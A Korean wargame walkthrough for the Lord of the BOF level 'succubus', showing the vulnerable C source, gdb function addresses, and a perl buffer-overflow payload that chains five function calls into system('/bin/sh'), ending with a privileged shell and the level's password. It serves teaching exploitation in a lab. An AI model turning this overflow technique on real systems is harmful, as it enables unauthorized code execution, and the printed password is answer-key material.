해커스쿨 LOB ( zombie_assassin -> succubus ) by ORANG

LOB_zombie_assassin

[zombie_assassin@localhost zombie_assassin]$ bash2 [zombie_assassin@localhost zombie_assassin]$ cat succubus.c /*         The Lord of the BOF : The Fellowship of the BOF         - succubus         - calling functions continuously */ #include <stdio.h> #include <stdlib.h> #include <dumpcode.h> // the inspector int check = 0; void MO(char *cmd) {         if(check != 4)                 exit(0);         printf("welcome to the MO!\n"); // olleh! system(cmd); } void YUT(void) {         if(check != 3)                 exit(0);         printf("welcome to the YUT!\n");         check = 4; } void GUL(void) {         if(check != 2)                 exit(0);         printf("welcome to the GUL!\n");         check = 3; } void GYE(void) { if(check != 1) exit(0); printf("welcome to the GYE!\n"); check = 2; } void DO(void) { printf("welcome to the DO!\n"); check = 1; } main(int argc, char *argv[]) { char buffer[40]; char *addr; if(argc < 2){ printf("argv error\n"); exit(0); } // you cannot use library if(strchr(argv[1], '\x40')){ printf("You cannot use library\n"); exit(0); } // check address addr = (char *)&DO;         if(memcmp(argv[1]+44, &addr, 4) != 0){                 printf("You must fall in love with DO\n");                 exit(0);         }         // overflow!         strcpy(buffer, argv[1]); printf("%s\n", buffer);         // stack destroyer // 100 : extra space for copied argv[1]         memset(buffer, 0, 44); memset(buffer+48+100, 0, 0xbfffffff - (int)(buffer+48+100)); // LD_* eraser // 40 : extra space for memset function memset(buffer-3000, 0, 3000-40); }

bash2 띄우고 ~ 소스를 보니 도개걸윷모 윷놀이 같네요

도,개,걸,윷,모 순서대로 함수를 호출하면, system(cmd)까지 도달할 수 있습니다.

함수를 연속적으로 호출한 후, 마지막 MO함수에서는 dummy(4) 에 *cmd를 전달해줘야겠네요

(gdb) disas DO Dump of assembler code for function DO: 0x80487ec <DO>: push   %ebp Dump of assembler code for function GYE: 0x80487bc <GYE>: push   %ebp (gdb) disas GUL Dump of assembler code for function GUL: 0x804878c <GUL>: push   %ebp (gdb) disas YUT Dump of assembler code for function YUT: 0x804875c <YUT>: push   %ebp (gdb) disas MO Dump of assembler code for function MO: 0x8048724 <MO>: push   %ebp

dummy(44) + DO + GYE + GUL + YUT + MO + dummy(4) + &”/bin/sh” 로 공격해 보겠습니다.

“/bin/sh”를 직접 넣어주고, 주소를 전달하였습니다.

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e'print "A"x44, "\xec\x87\x04\x08","\xbc\x87\x04\x08", "\x8c\x87\x04\x08", "\x5c\x87\x04\x08", "\x24\x87\x04\x08", "AAAA", "\x28\xfa\xff\xbf", "\x2f\x62\x69\x6e\x2f\x73\x68"'` AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\$AAAA(/bin/sh welcome to the DO! welcome to the GYE! welcome to the GUL! welcome to the YUT! welcome to the MO! bash$ id uid=516(zombie_assassin) gid=516(zombie_assassin) euid=517(succubus) egid=517(succubus) groups=516(zombie_assassin) bash$ my-pass euid = 517 here to stay

                        ̀

성공!!